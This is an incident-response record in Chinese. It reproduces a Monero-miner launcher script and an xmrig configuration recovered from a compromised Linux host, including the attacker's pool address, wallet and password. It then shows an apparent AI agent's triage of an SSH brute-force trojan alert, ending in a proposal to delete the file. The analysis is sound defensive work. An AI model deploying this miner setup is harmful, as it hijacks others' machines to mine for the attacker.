2025年11月19日 星期三
豆包解决方案
https://www.doubao.com/thread/wa73f1efd0fb859e0
挖矿病毒文件
#!/bin/bash
if ! pidof xmrig >/dev/null; then
nice /usr/workspace/xmrig $*
else
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
echo "门罗币矿工已经在后台运行。 拒绝运行另一个."
echo "如果要先删除后台矿工,请运行 \"killall xmrig\" 或 \"sudo killall xmrig\"."
fi
{
"api": {
"id": null,
"worker-id": null
},
"http": {
"enabled": false,
"host": "127.0.0.1",
"port": 0,
"access-token": null,
"restricted": true
},
"autosave": true,
"background": true,
"colors": true,
"title": true,
"randomx": {
"init": -1,
"init-avx2": 0,
"mode": "auto",
"1gb-pages": false,
"rdmsr": true,
"wrmsr": true,
"cache_qos": false,
"numa": true,
"scratchpad_prefetch_mode": 1
},
"cpu": {
"enabled": true,
"huge-pages": true,
"huge-pages-jit": false,
"hw-aes": null,
"priority": null,
"memory-pool": true,
"yield": true,
"max-threads-hint": 100,
"asm": true,
"argon2-impl": null,
"cn/0": false,
"cn-lite/0": false
},
"opencl": {
"enabled": false,
"cache": true,
"loader": null,
"platform": "AMD",
"adl": true,
"cn/0": false,
"cn-lite/0": false,
"panthera": false
},
"cuda": {
"enabled": false,
"loader": null,
"nvml": true,
"cn/0": false,
"cn-lite/0": false,
"panthera": false,
"astrobwt": false
},
"donate-level": 1,
"donate-over-proxy": 1,
"log-file": "/usr/workspace/xmrig.log",
"pools": [
{
"algo": null,
"coin": null,
"url": "auto.c3pool.org:19999",
"user": "47BRr9MAbQAQ7kEbLoow627GDmozrypu1f2CR2FLzCPdJKbQXNi63W7cB1YkLZkKmv79Es5KTkcFfAZemArqH9EGPx9trac",
"pass": "iZbp10moomxqop8e8yeknvZ",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"enabled": true,
"tls": false,
"tls-fingerprint": null,
"daemon": false,
"socks5": null,
"self-select": null,
"submit-to-origin": false
}
],
"print-time": 60,
"health-print-time": 60,
"dmi": true,
"retries": 5,
"retry-pause": 5,
"syslog": true,
"tls": {
"enabled": false,
"protocols": null,
"cert": null,
"cert_key": null,
"ciphers": null,
"ciphersuites": null,
"dhparam": null
},
"dns": {
"ipv6": false,
"ttl": 30
},
"user-agent": null,
"verbose": 0,
"watch": true,
"rebench-algo": false,
"bench-algo-time": 20,
"pause-on-battery": false,
"pause-on-active": false
}
木马病毒-SSH暴力破解
意图识别
用户输入的意图是要求对告警编号648286471进行研判分析,我需要根据提供的信息判断该告警的性质和影响。
获取告警详情
调用了“获取告警详情”工具,成功获取了该告警的详细信息,包括文件路径、MD5、SHA256、检测类型、处置建议等内容。
获取主机告警
调用了“获取主机告警”工具,正在查询该主机上是否有其他相关的告警信息,以评估影响范围。
获取溯源图信息
调用了“获取溯源图信息”工具,尝试获取该告警的溯源数据,以便分析其产生的原因和可能的传播路径。
Agent正在思考
当前分析的是一个木马程序告警,并且我拿到了该告警的详细信息和相关数据,接下来我需要进一步分析这些信息来判断风险等级并提出处理建议。
查询沙箱运行日志
调用工具名是“查询沙箱运行日志”,参数为 2b98a9ebf2924a09301668c99f0b532f,接口返回了空内容。
告警日志分析
告警事件概述:
2025年11月20日16:53,系统在IP为121.199.8.230的Linux主机上检测到一个名为/usr/bin/kladjy的可疑文件,该文件被云查杀引擎识别为木马程序,样本家族为 Trojan:Golang/Sshscan.AB。该木马程序由“系统体检扫描”方式发现,文件大小约为7.5MB,修改时间为2025年11月17日20:23。- 文件路径位于系统关键目录
/usr/bin/,通常用于存放系统可执行程序,攻击者常利用此路径隐藏恶意程序。 - 检测到的样本特征表明其为用Go语言编写的SSH暴力破解工具(Sshscan),可能具备扫描并尝试登录其他主机的能力,属于典型的横向移动或扩大控制范围的恶意行为。
- 虽然当前告警中进程ID为0、命令行为N/A,说明该文件可能未运行或已被终止,但仍存在潜在威胁。
- 文件路径位于系统关键目录
攻击手法科普:
“Trojan:Golang/Sshscan” 类型木马是近年来常见的跨平台后门工具,使用Go语言编写,具有免依赖、跨平台、混淆难度大等特点。此类木马通常在被攻陷服务器上部署,用于:- 扫描互联网或内网中的其他主机;
- 对开放SSH服务的设备进行密码爆破;
- 获取更多服务器权限以构建僵尸网络或挖矿集群。
攻击者往往通过弱口令、未修复漏洞等方式入侵初始主机后植入此类工具,实现自动化扩张攻击面。
原始日志分析
溯源图日志仅包含一条简单关系:文件 /usr/bin/kladjy 触发了本次告警。图中没有展示该文件是如何创建、由哪个父进程启动、是否有网络连接或其他子进程行为等关键上下文信息。
- 回溯链路极简,无法确认该文件是否由正常服务间接加载,也无法判断其是否处于活跃状态。
- 尽管缺乏完整行为链条,但结合其路径和检测特征,仍不能排除其为恶意载荷的可能性。
- 需注意:即使无活跃行为,静默驻留的木马也可能等待定时任务或远程指令激活。
当前回溯图提供的信息有限,未能还原完整的入侵路径,需依赖其他日志辅助判断。
主机告警关联分析
同时,发现主机上还存在其他多种类型的安全告警,包括多次“ECS暴力破解成功”记录(如2025-11-17 root账号从外网IP登录),以及多个已处理或加白的“挖矿程序”告警(如 /usr/bin/ghvwi 和 /usr/workspace/xmrig)。这些行为高度关联:攻击者通过SSH暴力破解获取系统权限后,植入挖矿程序及扫描类木马,形成持久化控制与资源窃取的组合攻击模式。
该主机长期存在异常登录和恶意软件活动,安全状况极差,已被实际攻陷并用于非法用途。
研判结果
研判依据:
本次告警检测到的文件 /usr/bin/kladjy 被识别为 Trojan:Golang/Sshscan.AB,属于典型的后渗透阶段使用的扫描型木马。尽管当前未捕获其运行时行为,但结合主机历史告警可见:早在2025年11月17日即发生针对root账户的暴力破解成功事件,并随后检测到多个挖矿程序运行。这一系列行为构成清晰的攻击链——攻击者通过弱密码突破SSH防线,上传并部署多种恶意工具,包括资源占用型挖矿程序和用于扩散的扫描木马。因此,该文件极大概率是攻击者实施横向移动的一部分,而非误报。综合判断为真实攻击。
任务分析
当前处理的是一条恶意进程(云查杀)告警,涉及文件实体/usr/bin/kladjy。根据研判结论,该告警被判定为真实攻击。接下来,我需要结合这一结论,生成针对该文件实体的处置动作。
处置动作生成
经过思考,我生成了一版待处置的动作草稿,计划删除恶意文件/usr/bin/kladjy。在执行此操作前,我需要对这份处置动作进行审计分析,确保其合适性,并评估是否会对用户的业务造成影响,最终生成合理的处置动作建议。
处置建议
待审计处置动作
- 对文件实体
/usr/bin/kladjy(EntityUuid:625eff14955181d1fee7685692290d41)执行删除操作(delete_file),处置剧本为system_aliyun_aegis_quara_file_book。
逻辑一致性审计
研判结论为“真实攻击”,其分析过程提供了充分的上下文支持:该主机曾发生SSH暴力破解成功事件,并检测到多个挖矿程序,结合当前文件路径位于系统目录 /usr/bin/、样本家族为 Trojan:Golang/Sshscan.AB 的特征,判断其为攻击者用于横向移动的恶意工具,逻辑链条完整且合理。处置动作针对确认的恶意文件进行清除,与研判结果保持一致,前后逻辑无矛盾。
处置风险审计
虽然 /usr/bin/kladjy 被识别为恶意文件且位于系统目录,但需审慎评估其删除是否会影响系统稳定性。根据规则,若文件属于系统关键组件或用户核心业务依赖,则不应直接删除。
然而,kladjy 并非已知的系统保留文件或常见服务组件名称,且其被云查杀引擎明确标记为木马程序,结合主机上已有多个同类恶意程序(如 /usr/bin/ghvwi)的历史记录,可判定其不具备合法系统功能。此外,该文件未在当前运行(进程ID为0),删除不会引发运行时中断。
因此,对该文件执行删除操作不涉及系统核心进程或服务依赖,亦不触及任何特殊IP或Docker调试接口等高风险对象,处置方式在当前上下文中是安全的。
处置动作校验
本次共验证1个待处置实体,全部通过校验,无检验错误信息。处置的实体类型、名称、UUID均与抽取结果一致,且处置方法 delete_file 属于合法操作范畴,符合流程规范要求。
处置结论
最后编辑:李世民 更新时间:2025-11-20 17:11
